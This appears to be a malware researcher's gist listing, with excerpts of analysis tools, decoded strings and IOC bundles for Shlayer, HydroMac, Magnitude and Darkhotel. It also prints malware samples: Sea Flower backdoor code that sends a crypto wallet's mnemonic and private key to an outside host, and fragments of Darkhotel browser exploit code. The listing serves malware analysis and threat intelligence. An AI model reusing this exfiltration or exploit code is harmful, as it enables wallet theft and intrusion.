tahaconfiant / shlayer_decrypt.py
Created December 23, 2022 15:14
command line script to decrypt OSX/Shlayer.F C2 configuration
# author : taha@confiant.com aka lordx64
# OSX/Shlayer.F C2 config extracting from DMG files
# copyright 2022 - All rights reserved
# compatible python 3.8
# Note on installation on mac:
# brew install gmp
# then: env "CFLAGS=-I/usr/local/include -L/usr/local/lib" pip3 install pycrypto
from Crypto.Cipher import AES
import argparse
tahaconfiant / seaflower2.js
Created June 12, 2022 08:34
Sea Flower backdoor React Native Bundle
function startupload()
{
if(xlmnmonic!="" && xlmnmonic!=null && xladdress!=null)
{
var demoString = xlmnmonic+"@"+xladdress+"@"+xlPrivateKey;
fdsafasdf("https://trx.lnfura.org/api/metamask/ios/GDBPXJ1EXQXWFUAGZRIH3FOVR0SO0VDJLIZLVE1LYOXZECZ61FDC1EHNSPX7KDZWIENCPV7H3KRYNOIENCRTDOIHV2RPKMG4CC4UIDVIJJUTGAIWU7MV6BR8LPJA6XT5",demoString);
tahaconfiant / seaflower.js
Created June 12, 2022 08:30
Sea Flower backdoor React Native bundle - variant 2
// Module-level state for the Sea Flower bundle: every slot starts empty
// (empty string, zero, empty object or null). The names suggest a wallet
// mnemonic plus password/data caches, but the code that fills and reads
// them is not in this excerpt — confirm against the rest of the bundle.
var xlpwd = null;
var xlepwd = null;
var xlhookTime = 0;
var monic = "";
var xldata = "";
var xlPdata = "";
var xlcaches = {};
var xlpcaches = {};
function mcode(str)
{
tahaconfiant / hydromac_strings.txt
Created June 3, 2021 17:43
Hydromac Decrypted strings
encrypted string at 0x100051a6a decoded to :
encrypted string at 0x100051b2c decoded to : IOPlatformExpertDevice
encrypted string at 0x100051ff5 decoded to :
encrypted string at 0x100051ffe decoded to : BadAllocException
encrypted string at 0x100052057 decoded to : -
encrypted string at 0x100052060 decoded to : OutOfRangeException
encrypted string at 0x100051e12 decoded to : -
encrypted string at 0x100051e1b decoded to : BadAllocException
encrypted string at 0x100051e74 decoded to : -
encrypted string at 0x100051e7d decoded to : OutOfRangeException
tahaconfiant / hydromac_decrypt.py
Created June 3, 2021 17:42
HydroMac IDAPython script to decrypt strings
# author : taha@confiant.com aka lordx64
# copyright 2021 - All rights reserved
# tested against macOS/Hydromac sample (aka MapperState) 919d049d5490adaaed70169ddd0537bfa2018a572e93b19801cf245f7fd28408
# compatible python 3.8, and IDAPython for IDA 7.6.210319
# this HydroMac String decryptor uses a helper class UEMU_HELPERS taken from https://github.com/alexhude/uEmu project
import idc
import struct
import idautils
from abc import ABC, abstractmethod
tahaconfiant / magnitude_IOCs_stixv2.1.txt
Created July 13, 2020 05:47
magnitude_IOCs_stixv2.1
{
"type": "bundle",
"id": "bundle--1085f2d7-28e4-42cd-a8f5-deb2f065902f",
"objects": [
{
"type": "domain-name",
"id": "domain-name--b90b246a-0b50-5c64-80d1-0d118efd9ef6",
"value": "pophot.website",
"spec_version": "2.1"
},
tahaconfiant / darkhotel_IOCs_STIXv2.1.txt
Last active July 31, 2020 02:29
darkhotel_IOCs STIX v2.1
{
"type": "bundle",
"id": "bundle--7dca0b30-9c3f-4978-8b2a-b83851bfc37a",
"objects": [
{
"type": "ipv4-addr",
"id": "ipv4-addr--94f94345-3a11-5654-aacd-61496d6f5409",
"value": "103.224.82.234",
"spec_version": "2.1"
},
tahaconfiant / darkhotel_stack_pivot.js
Created July 10, 2020 06:38
darkhotel_stack_pivot
// Analyst excerpt: S, O and V are helpers defined outside this snippet, so
// their arguments and return values cannot be verified here. The author's
// own "<---" comments are the only description of what aB and aC hold.
var aA = S(O, V(O));
var aB = ((aA.charCodeAt(4) << 16) | aA.charCodeAt(3)) - 0x44; // <--- points to a return address in the native stack
// Calls V() at ten 0x1000-byte steps below aB; the effect of V() is not
// visible in this excerpt — confirm in the full sample before relying on it.
for (var A = 0; A < 10; A++) V(aB - (0x1000 * A));
var aC = aB - 0x2000; // <--- will be used for the ROP chain layout
//<code skipped>
// "CAFEBABE" is a recognizable marker string; what the RegExp object and its
// .source read are used for is not shown in this excerpt.
var test = new RegExp("CAFEBABE");
test.source;
tahaconfiant / write-what-where-jscript.html
Created July 9, 2020 08:14
write-what-where-jscript
<!DOCTYPE html>
<html>
<head>
<script>
function myFunction() {
var l = "\u614E\u4B74\u01c8\u0000\u0024\u0000\u0159\u0000\u0002\u0000\u0000\u0000\u0001\u0000\u0000\u0000\u0000\u0000" + "\u1E12\u0001\u1200\u0009\u0000\u740A\u1100\u770A\u0400\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\uEF04\uFFFF\uF7FF\uFFFF\u00FF\u0000\uFF00\uFFFF\u04FF\uFFEF\uFFFF\uFFF7\uFFFF\u0000\u0000\uFFFF\uFFFF\u0D03\u0000\u0000\u0000\u6F00\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0000\u0000\u0D03\u0000\uFE00\uFFFF\u00FF\u0000\u0400\uFFEF\uFFFF\u000B\u0000\u0000\u0000\uFFFF\uFFFF\u2B04\u0000\u0000\u0000\u0000\u0000\uFF00\uFFFF\u03FF\u000D\u0000\uFFF3\uFFFF\u000E\u0000\u0112\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u0016\u0000\u0D03\u0000\u0B00\u0000\u0700\u0000\u0300\u000D\u0000\uFFF3\uFFFF\u001A\u0000\u0D03\u0000\u0B00\u0000\u0000\u0000\u0300\u000D\u0000\uFFFB\uFFFF\u0000\u0000\u0D03\u0000\uF300\uFFFF\u1BFF\u0000\u1500\u1312\u0000\u0300\